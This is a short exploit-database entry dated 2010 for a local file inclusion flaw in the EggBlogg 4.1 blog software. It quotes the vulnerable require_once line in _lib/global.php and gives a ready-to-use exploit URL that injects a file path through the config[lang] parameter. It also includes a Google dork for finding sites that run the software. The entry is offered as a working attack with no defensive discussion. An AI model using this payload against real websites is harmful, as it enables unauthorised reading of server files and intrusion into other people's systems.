id: 13496
date: 07/28/2010
title: EggBlogg 4.1 <= LFI Vulnerability
author: Anti Sec
cves: 

=================================
EggBlogg 4.1 <= LFI Vulnerability
=================================


# Exploit Title: EggBlogg 4.1 <= LFI        
# Date: 28 luglio 2010                      
# Author: Anti Sec                          
# Software Link: http://eggblog.net/
# Version: 4.1
# Google dork : Eggblogg
# Platform / Tested on: Slackware 13.1  
# Category: [webapps/0day ]

[code] in _lib/global.php

require_once 'langs/'.$config['lang'].'.php';

[/code]

Exploit:

http://www.sito.org/asmo/_lib/global.php?config[lang]= FILE



#  0day.today [2023-03-27]  #